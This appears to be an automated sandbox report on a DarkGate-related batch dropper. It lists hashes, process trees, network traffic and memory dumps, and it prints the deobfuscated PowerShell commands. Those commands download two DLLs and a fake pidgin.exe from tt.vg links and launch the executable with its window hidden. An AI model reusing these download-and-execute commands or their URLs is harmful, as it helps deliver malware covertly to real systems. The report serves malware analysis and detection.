Resubmissions

25-08-2024 09:52

240825-lwb7jsxgmh 10

22-08-2024 07:27

240822-h98wwsvdrh 10

22-08-2024 07:21

240822-h651tsxhrk 10

21-08-2024 20:21

240821-y44b8aydje 10

Analysis

  • max time kernel
    16s
  • max time network
    18s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags
    arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    21-08-2024 20:21

General

  • Target

    exe/crypted/Dakrgate 5864 startup plus rootkit/Batch file for 5864v dll crypted darkgate/update.bat

  • Size

    6KB

  • MD5

    97b7c88a02b2a5214d742b7ed50f4544

  • SHA1

    15bf7dd44049b94db1a82504802ead45f6186fa0

  • SHA256

    20c3a5b1c87627e9e016494b806273230f5023cf12d2c0e29eceecb7b8a6d3b6

  • SHA512

    918c856e61d8b348a705227ec381a8101481ec3aaa4a1f6545b9706ebf491d311cfe716f62ab04c796333bae5df857fc67cac86760be1c67578ca1031a906b25

  • SSDEEP

    192:GqNFRmxkyzz06ETWtd4pTunJ8ccJkBhKhgQ:Vp2kgzSTWsu6hJEhKht

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
&{$wc = new-object system.net.webclient, $wc.downloadfile("https://tt.vg/download-update-dll1", "C:\\Users\\Admin\\AppData\\Local\\Temp\\libssp-0.dll"), $wc.downloadfile("https://tt.vg/dlldownload2sqliuit-download", "C:\\Users\\Admin\\AppData\\Local\\Temp\\sqlite3.dll"), $wc.downloadfile("https://tt.vg/download-latest-update", "C:\\Users\\Admin\\AppData\\Local\\Temp\\pidgin.exe")}
URLs
exe.dropper

https://tt.vg/download-update-dll1

exe.dropper

https://tt.vg/dlldownload2sqliuit-download

exe.dropper

https://tt.vg/download-latest-update

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\exe\crypted\Dakrgate 5864 startup plus rootkit\Batch file for 5864v dll crypted darkgate\update.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2812
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -Command "& {$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://tt.vg/download-update-dll1', 'C:\Users\Admin\AppData\Local\Temp\libssp-0.dll'); $wc.DownloadFile('https://tt.vg/dlldownload2sqliuit-download', 'C:\Users\Admin\AppData\Local\Temp\sqlite3.dll'); $wc.DownloadFile('https://tt.vg/download-latest-update', 'C:\Users\Admin\AppData\Local\Temp\pidgin.exe')}"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3644
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -Command "& {Start-Process 'C:\Users\Admin\AppData\Local\Temp\pidgin.exe' -WindowStyle Hidden}"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:1604

Network

  • US
    DNS
    tt.vg
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    tt.vg
    IN A
    Response
    tt.vg
    IN A
    104.21.70.180
    tt.vg
    IN A
    172.67.138.42
  • US
    GET
    https://tt.vg/download-update-dll1
    powershell.exe
    Remote address:
    104.21.70.180:443
    Request
    GET /download-update-dll1 HTTP/1.1
    Host: tt.vg
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Wed, 21 Aug 2024 20:21:55 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=dul5kemnkodf002ot2g98f74nm; path=/
    Set-Cookie: short_62777=1; expires=Wed, 21-Aug-2024 20:36:55 GMT; Max-Age=900; path=/; HttpOnly
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    location: https://s.id/libsdll1-update-new
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f1NML9Qi8ktl%2FBs0oCtU7OkNj2FhAPBcIgr6lsmek70UwHS2g06CCkRTuBAfp9zZZnRIxgYE2F4tcp2TP207PTPy7k%2BlI9k8reoGFcc6y%2BHNcx%2B5vKC2Dg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8b6d550d0d819563-LHR
    alt-svc: h3=":443"; ma=86400
  • US
    GET
    https://tt.vg/dlldownload2sqliuit-download
    powershell.exe
    Remote address:
    104.21.70.180:443
    Request
    GET /dlldownload2sqliuit-download HTTP/1.1
    Host: tt.vg
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Wed, 21 Aug 2024 20:21:58 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=ek7p5mfg50ih01q01vdiedo86h; path=/
    Set-Cookie: short_62778=1; expires=Wed, 21-Aug-2024 20:36:58 GMT; Max-Age=900; path=/; HttpOnly
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    location: https://s.id/sqitdll2-update-new
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9fsFPHaF9Mbk3aqPOa701HPM%2Bui23%2FSmPj%2F8KoawxaXOdFDVeXnw78z9Gn4wL3bTPDmahtB6589jf3bBDQTkewiniIoNMEH0Gq3lC3Qom7OFQ%2BO8MzjfFg%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8b6d551b3e609563-LHR
    alt-svc: h3=":443"; ma=86400
  • US
    GET
    https://tt.vg/download-latest-update
    powershell.exe
    Remote address:
    104.21.70.180:443
    Request
    GET /download-latest-update HTTP/1.1
    Host: tt.vg
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Wed, 21 Aug 2024 20:22:00 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=0abdq5oa4nhgpdrs7man5ggvr0; path=/
    Set-Cookie: short_56843=1; expires=Wed, 21-Aug-2024 20:37:00 GMT; Max-Age=900; path=/; HttpOnly
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    location: https://s.id/new-updatepidgin-latest
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6w1wvFc89y%2BIhN%2Bqc4Ja8hVZElXAb%2Bmp%2BroZxO9sW4QzzPt7otFtEggLk0eX%2FvPFtqq4hfX0TXXrAfOaZakQsGir2WmRn4nBU%2B3FnPZd6hhJ399hLmGucA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8b6d55290fab9563-LHR
    alt-svc: h3=":443"; ma=86400
  • US
    DNS
    0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa
    IN PTR
    Response
  • US
    DNS
    180.70.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    180.70.21.104.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    s.id
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    s.id
    IN A
    Response
    s.id
    IN A
    193.84.85.178
  • HK
    GET
    https://s.id/libsdll1-update-new
    powershell.exe
    Remote address:
    193.84.85.178:443
    Request
    GET /libsdll1-update-new HTTP/1.1
    Host: s.id
    Connection: Keep-Alive
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx
    Date: Wed, 21 Aug 2024 20:21:57 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 10288
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Robots-Tag: noindex
    Cache-Control: private, max-age=3
    Strict-Transport-Security: max-age=15724800; includeSubDomains
  • US
    DNS
    178.85.84.193.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    178.85.84.193.in-addr.arpa
    IN PTR
    Response
  • HK
    GET
    https://s.id/sqitdll2-update-new
    powershell.exe
    Remote address:
    193.84.85.178:443
    Request
    GET /sqitdll2-update-new HTTP/1.1
    Host: s.id
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx
    Date: Wed, 21 Aug 2024 20:21:59 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 10288
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Robots-Tag: noindex
    Cache-Control: private, max-age=3
    Strict-Transport-Security: max-age=15724800; includeSubDomains
  • HK
    GET
    https://s.id/new-updatepidgin-latest
    powershell.exe
    Remote address:
    193.84.85.178:443
    Request
    GET /new-updatepidgin-latest HTTP/1.1
    Host: s.id
    Response
    HTTP/1.1 403 Forbidden
    Server: nginx
    Date: Wed, 21 Aug 2024 20:22:03 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 10288
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Robots-Tag: noindex
    Cache-Control: private, max-age=3
    Strict-Transport-Security: max-age=15724800; includeSubDomains
  • 104.21.70.180:443
    https://tt.vg/download-latest-update
    tls, http
    powershell.exe
    1.1kB
    6.2kB
    12
    11

    HTTP Request

    GET https://tt.vg/download-update-dll1

    HTTP Response

    301

    HTTP Request

    GET https://tt.vg/dlldownload2sqliuit-download

    HTTP Response

    301

    HTTP Request

    GET https://tt.vg/download-latest-update

    HTTP Response

    301
  • 193.84.85.178:443
    https://s.id/libsdll1-update-new
    tls, http
    powershell.exe
    1.1kB
    16.3kB
    17
    22

    HTTP Request

    GET https://s.id/libsdll1-update-new

    HTTP Response

    403
  • 193.84.85.178:443
    https://s.id/sqitdll2-update-new
    tls, http
    powershell.exe
    1.1kB
    16.5kB
    16
    21

    HTTP Request

    GET https://s.id/sqitdll2-update-new

    HTTP Response

    403
  • 193.84.85.178:443
    https://s.id/new-updatepidgin-latest
    tls, http
    powershell.exe
    1.3kB
    15.1kB
    17
    20

    HTTP Request

    GET https://s.id/new-updatepidgin-latest

    HTTP Response

    403
  • 8.8.8.8:53
    tt.vg
    dns
    powershell.exe
    51 B
    83 B
    1
    1

    DNS Request

    tt.vg

    DNS Response

    104.21.70.180
    172.67.138.42

  • 8.8.8.8:53
    0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa
    dns
    118 B
    182 B
    1
    1

    DNS Request

    0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa

  • 8.8.8.8:53
    180.70.21.104.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    180.70.21.104.in-addr.arpa

  • 8.8.8.8:53
    s.id
    dns
    powershell.exe
    50 B
    66 B
    1
    1

    DNS Request

    s.id

    DNS Response

    193.84.85.178

  • 8.8.8.8:53
    178.85.84.193.in-addr.arpa
    dns
    72 B
    132 B
    1
    1

    DNS Request

    178.85.84.193.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dzwk30aw.iqj.ps1

    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

  • memory/3644-0-0x00007FFA7ECD3000-0x00007FFA7ECD4000-memory.dmp

    Filesize

    4KB

  • memory/3644-5-0x0000020F43FB0000-0x0000020F43FD2000-memory.dmp

    Filesize

    136KB

  • memory/3644-7-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

    Filesize

    9.9MB

  • memory/3644-9-0x0000020F5C740000-0x0000020F5C7B6000-memory.dmp

    Filesize

    472KB

  • memory/3644-10-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

    Filesize

    9.9MB

  • memory/3644-26-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

    Filesize

    9.9MB

  • memory/3644-43-0x00007FFA7ECD3000-0x00007FFA7ECD4000-memory.dmp

    Filesize

    4KB

  • memory/3644-44-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

    Filesize

    9.9MB

  • memory/3644-56-0x00007FFA7ECD0000-0x00007FFA7F6BC000-memory.dmp

    Filesize

    9.9MB
